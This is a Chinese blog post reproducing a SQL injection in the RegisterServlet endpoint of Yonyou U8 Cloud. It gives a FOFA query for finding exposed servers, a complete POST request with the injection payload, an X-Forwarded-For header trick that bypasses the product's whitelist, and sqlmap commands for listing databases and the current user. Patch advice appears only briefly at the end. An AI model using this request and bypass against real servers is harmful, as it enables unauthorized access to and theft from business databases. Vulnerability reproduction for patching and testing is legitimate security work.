用友u8-cloud RegisterServlet SQL注入漏洞复现

已于 2023-12-27 18:34:08 修改
阅读量1.1k 收藏 17
点赞数 28
分类专栏: 漏洞复现 文章标签: 数据库 用友u8 sql注入 安全漏洞
于 2023-12-25 08:00:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiayu729100940/article/details/135129748
版权

用友U8 cloud是用友推出的企业上云数字化平台,该产品RegisterServlet接口处存在SQL注入漏洞,攻击者可通过该漏洞获取数据库权限。

1.1 漏洞级别

高危

1.2 适用范围

所有版本(截至到2023年11月前发布的)

1.3 快速检索

fofa语法: title="u8c"

1.4 漏洞复现

该漏洞利用非常简单,只需构造post请求

POST
url/servlet/RegisterServlet

传递的参数为

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
#这里的参数是测试语句 可以生成一个123456对应的md5值

但是在实际测试中,我们很大可能性会遇到以下响应
在这里插入图片描述
因为用友其实存在安全机制,在不允许的白名单下是禁止使用注册相关的接口的,但是我们依然可以进行绕过,只需要构造一个x-forwarded-for头即可,那么完整的请求包应该如下:

POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.1.1:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
x-forwarded-for: 127.0.0.1
Content-Length: 85

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

发包后即可成功触发漏洞。在这里插入图片描述

1.5 进一步利用

到这一步我们已经可以证明漏洞存在了, 如果想进一步利用的话 可以使用sqlmap操作。我们可以将上文的请求包保存到本地txt。然后通过sqlmap执行

python3 sqlmap.py -r 1.txt

在这里插入图片描述可以看到漏洞能被正常利用。

一些简单的sqlmap语句

python3 sqlmap.py -r 1.txt  --dbs --current-user   #查询数据库和当前用户

在这里插入图片描述
进一步提权的话可以看sqlmap的一些指令,这里就不详述了,只是给大家提供一个方法~

1.6 修复方案

  • 升级补丁<U8CLOUD所有版本RegisterServlet接口存在SQL注入漏洞的安全补丁>
名称适用版本
U8CLOUD所有版本RegisterServlet接口存在SQL注入漏洞的安全补丁3.2~3.6sp
U8CLOUD低于v3.2版本RegisterServlet接口存在SQL注入漏洞的安全补丁2.0,2.1,2.3,2.5,2.6,2.65,2.7,3.0,3.1
U8CLOUDv5.0版本RegisterServlet接口存在SQL注入漏洞的安全补丁5.0

在这里插入图片描述

fly夏天
关注
  • 28
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【1day】用友U8Cloud未授权访问漏洞学习
记录并分享学习安全的知识点..
10-16 377
用友U8Cloud是用友软件股份有限公司推出的一款云端企业管理软件。它是基于用友NC平台的云计算解决方案,能够为企业提供全面的业务管理服务。用友U8Cloud存在未授权访问漏洞,攻击者可以通过某种方式绕过身份验证机制,直接访问应用程序或系统的敏感资源或功能,从而获取敏感信息或进行恶意操作的一种漏洞
用友U8 cloud V1.0-自定义技术红皮书.pdf
02-16
用友U8 cloud V1.0-自定义技术红皮书
U8cloud系统ReportDetailDataQuery接口SQL注入漏洞分析
qq_42067124的博客
12-28 582
U8cloud系统ReportDetailDataQuery接口SQL注入漏洞分析
漏洞用友-U8C-Cloud-base64-sql注入
最新发布
知黑而守白
03-14 112
用友U8Cloud是用友网络科技股份有限公司(简称“用友网络”)推出的一款云端企业管理软件。用友U8Cloud提供了全面的企业管理功能,包括财务管理、人力资源管理、供应链管理、采购管理、销售管理等。支持多种业务模式,适用于不同行业和企业规模的需求,帮助企业实数字化转型和云端化管理。用友U8Cloud base64 接口存在SQL注入漏洞,该漏洞使得攻击者可以通过构造精心设计的恶意SQL语句,成功执行未经授权的数据库操作。此漏洞可能导致敏感信息泄露、数据库被篡改或其他安全风险。
用友U8-OA标准方案.docx
05-26
用友U8-OA标准方案
用友U8 cloud V1.0-公式技术红皮书.pdf
02-16
用友U8 cloud V1.0-公式技术红皮书
漏洞--用友U8-cloud RegisterServlet SQL注入
qq_53003652的博客
11-14 863
U8 cloud集中于企业内部管理管控,管理规范,高效,协同,透明。通过云模式,低成本,快速部署,即租即用帮助企业免除硬软件投入的快速 搭建企业管理架构。通过云服务连接,业务模式、服务模式的经营创新。该产品RegisterServlet处存在SQL注入。访问/servlet/RegisterServlet。如上页面即可能存在漏洞用友U8-Cloud
漏洞分析 | U8 Cloud ServiceDispatcher反序列化漏洞及补丁分析
m0_46699477的博客
11-04 1118
本文对 U8Cloud ServiceDispatcher 接口反序列化漏洞原理进行跟踪分析,讲述了该漏洞是如何被利用以及官方的修方式。
用友U8 Cloud 多处反序列化RCE漏洞
0xSec
12-10 1564
用友U8 Cloud存在多处(TableInputOperServlet、LoginServlet、FileTransportServlet、CacheInvokeServlet、ActionHandlerServlet、ServletCommander、MxServlet 、MonitorServlet、LoggingConfigServlet、ClientRequestDispatch)反序列化漏洞,系统未将用户传入的序列化数据进行过滤就直接执行反序列化操作,最终造成服务器失陷
用友GRP-U8 SQL注入漏洞
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
09-26 1490
用友GRP-U8 SQL注入漏洞
用友U8 Cloud AppPhoneServletService SQL注入漏洞
0xSec
02-27 374
用友U8 Cloud AppPhoneServletService接口处存在SQL注入漏洞,未授权的攻击者可通过此漏洞获取数据库权限,从而盗取用户数据,造成用户信息泄露。
用友u8-ERP应用流程.doc
11-03
用友u8-ERP应用流程
用友U8-V13财务及供应链操作手册.pdf
01-06
用友 U8+V13 财务及供应链操作手册 (总账报表 固定资产 应收/应付款管理 采购 销售 库存 存货核算)
Goby 漏洞发布|用友 U8 Cloud ActionHandlerServlet 远程代码执行漏洞
m0_46699477的博客
11-07 312
用友 U8 Cloud 是一种基于企业互联网理念设计的云 ERP 整体解决方案,集成了人力资源、财务会计、物流库存、客户关系和生产制造等功能,旨在推动企业实敏捷经营、轻量化管理和简化IT操作,并提供安全可信、合规可靠的服务。用友 U8 Cloud 存在反序列化代码执行漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。
SQL 注入漏洞详解
m0_60571990的博客
12-19 3588
SQL 注入漏洞详解
用友GRP-U8注入
zkaqlaoniao的博客
10-26 176
fofa:app=”用友-GRP-U8”用友GRP-U8存在SQL注入漏洞文件名为bx_historyDataCheck.jsp。
用友u8-cloud RegisterServlet SQL注入
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
12-01 363
U8 Cloud是用友公司推出的企业上云数字化平台,为成长型和创新型企业提供全面的云ERP解决方案。该平台中存在一个安全漏洞,涉及RegisterServlet接口对用户输入参数缺乏有效过滤,可能导致SQL注入攻击。攻击者可通过此漏洞未经授权地访问数据库,造成潜在的信息泄露风险。建议尽快修漏洞,强化输入验证,提升系统安全性。
用友OA U8 test.jsp sql注入漏洞
qq_44828901的博客
06-21 1434
简单验证、漏洞
用友u8 cloud 反序列化rce漏洞
12-05
用友U8 Cloud是一款企业级管理软件,但是近期被发存在反序列化远程命令执行(RCE)漏洞。要这个漏洞,首先需要一个能够触发反序列化的点,比如一个可控制的对象。接下来,我们可以构造一个恶意的序列化数据,然后将这个数据传递给U8 Cloud系统,让系统进行反序列化操作。当系统对这个数据进行反序列化时,就会触发我们植入的恶意代码,从而实远程命令执行。 为了更具体地说明这个过程,我们可以借助一个简单的例子来解释。假设我们构造了一个包含恶意命令的序列化数据,并将其发给U8 Cloud系统。系统在接收到这个数据后,会将其解析,然后执行其中的命令。这样一来,我们就成功地利用了反序列化漏洞来实远程命令执行。 当然,为了成功这个漏洞,还需要一些具体的技术细节和环境配置。需要了解U8 Cloud系统的结构和漏洞的具体利用方式,还可能需要使用特定的工具来构造恶意的序列化数据。在过程中,一定要格外小心,确保不会对受影响的系统造成损害。同时,及时向厂商反馈该漏洞,以便及时修和加强系统安全防护。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值